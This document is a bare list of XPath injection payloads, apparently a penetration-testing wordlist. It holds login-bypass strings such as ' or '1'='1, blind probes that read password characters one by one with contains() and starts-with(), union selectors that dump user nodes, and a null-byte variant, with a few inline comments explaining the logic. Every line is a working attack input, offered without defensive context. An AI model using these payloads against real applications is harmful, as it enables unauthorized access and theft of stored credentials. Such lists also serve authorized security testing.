 ')]/child::node() | PseudoTime[contains(PseudoTime,'
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
search=')] | //user/*[contains(*,'
search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
' or 1]%00
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())
'or string-length(name(.))<10 or' #Select account with length(name)<10
'or contains(name,'adm') or' #Select first account having "adm" in the name
'or contains(.,'adm') or' #Select first account having "adm" in the current value
'or position()=2 or' #Select 2ยบ account
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())
admin' or '
admin' or '1'='2
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())

') or 1=1 or (' 
') or 1=1] 
') or 2=1] 
')] 
')] 
') or 1=1]
')] 
')]/../*[3][text()!=('
')] | //user/*[1] | a
')] | //user/*[2] | a[(' 
')] | //user/*[3] | a[(' 
')] | //user/*[4] | a[(' 
